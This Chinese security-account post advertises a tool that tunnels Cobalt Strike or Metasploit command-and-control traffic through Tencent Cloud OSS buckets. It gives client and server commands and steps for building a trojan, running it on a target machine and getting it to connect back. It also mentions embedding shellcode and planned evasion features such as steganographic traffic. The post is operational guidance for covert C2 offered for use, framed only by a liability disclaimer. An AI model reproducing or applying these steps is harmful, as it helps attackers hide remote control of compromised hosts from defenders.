免责声明
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全“设为星标”,否则可能就看不到了啦!
安全工具
工具介绍
利用腾讯云oss,来转发http流量,可以用来cs/msf上线等
工具使用
.oss-stinger.exe
-address string
监听地址或者目标地址,格式:127.0.0.1:8080
-id string
输入你的腾讯云SecretID
-key string
输入你的腾讯云SecretKey
-mode string
client/server 二选一
-url string
输入你腾讯云OSS桶的url地址
首先,现在cs生成一个http的listen,并把host都改成127.0.0.1,然后生成木马 然后再把Host改会公网IP(这步很重要)
然后去腾讯云,申请一个oss桶。拿到URL 然后再去 https://console.cloud.tencent.com/cam/capi
拿到SecretKey和SecretID。
然后就可以使用我们的工具了,先在客户机上起一个转发器,使用命令
oss-stinger.exe -mode client -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
然后服务器运行
oss-stinger.exe -mode server -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
然后在客户机双击你的木马,就能上线了
Tips
如果要弄成一个文件,自行修改代码把shellcode加入进去然后用go runshellcode()
即可。
secretkey和secretid的安全问题,目前没有什么好的解决方案,可以考虑弄一个动态下发的。自己修改吧
TODO
-
修改流量特征(纯Base64太蠢了,预计后续看看能不能弄成一个图片隐写来传输流量)
-
自定义OSS交换文件(其实这只要改几行代码就行,但是我就是纯纯懒狗一条)
-
添加阿里云/aws等支持(其实下个sdk调用调用就行了,但是我还是就是懒狗一条)
-
添加其他协议支持(可能会咕,TCP这种无状态的长连接不太好处理,但是也不是不能处理,让我想想)
工具下载
点击关注下方名片进入公众号
回复关键字【231209】获取下载链接
往期精彩
一款永久提供服务的安全武器库
第六届CSA认证年度集训CCPTP云渗透测试认证专家培训—你确定不来整一个?
应急响应检测工具
原文始发于微信公众号(夜组安全):利用oss实现http转发/cobalt strike上线